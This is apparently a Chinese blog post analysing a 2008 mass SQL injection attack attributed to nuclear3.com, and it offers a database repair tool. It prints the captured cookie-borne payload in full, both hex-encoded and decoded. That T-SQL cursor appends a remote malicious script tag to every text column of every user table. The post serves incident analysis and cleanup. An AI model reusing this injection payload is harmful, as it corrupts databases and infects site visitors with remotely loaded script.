nuclear3.com挂马分析
通常的防注入程序只对 request.form 和 request.querystring 做了检查过滤,
一不小心数据库被挂了码,又没有及时做备份,只要一个一个表的恢复,现在加功能整理到这个小软件里,希望能方便大家。
nuclear3.com挂马分析
通常的防注入程序只对 request.form 和 request.querystring 做了检查过滤,
当代码中存在request("userid")时,request自动一次访问form querystring cookies,
这个时候黑客通过伪造的cookies绕过通常的过滤执行了挂马。
通过cookies提交的内容如下
221.130.*.* 2008-12-19 3:29:26 /s*_*.asp Cookie id
Code
76435;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E007600650072007400280056006100720063006800610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C0053006300720069007000740020005300720063003D0068007400740070003A002F002F002500360033002500320045006E00750063006C0065006100720033002E0063006F006D002F006300730073002F0063002E006A0073003E003C002F005300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);-- exec通过cast函数转后的语句为
CaSt
Code
Declare @T Varchar(255),@C Varchar(255) Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167) Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0) Begin Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>''')Fetch Next From Table_Cursor Into @T,@C End Close Table_Cursor Deallocate Table_Cursor
其中<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>不断变化,甚至多次被注入,无法通过简单的替换一次清理干净。
最好通过正则表达式替换。
数据库挂马修复工具
说明:
1将数据库备份在本地的还原进行修复
*注意一定做好备份工作
*本地修复性能较好
*没有多台机器,建议使用虚拟机vmware
2此程序运行需要dotnet framework 2.0
支持 sql2000 sql2005
3设置数据库连接,需要使用sa用户,修复过程中使用正则表达,需要管理员权限。
4 ntext数据类型的字符串不能再直接替换,请选择ntext修复,通过设置陪需分段修复,建议之小于5000
分批处理每次不超过1000
5 普通修中注意主键字段的填写,一般为int类型。
6 普通修复暂时没有没有分段修复功能,数据最好不要超过10W
发布记录
v0.12 内部邀请测试,细节有待改善,性能有待改进
联系我:cnhefang@gmail.com
错误信息最好截图
下载地址:
https://files.cnblogs.com/cnhefang/sqlfixer.rar
转载须指明出处
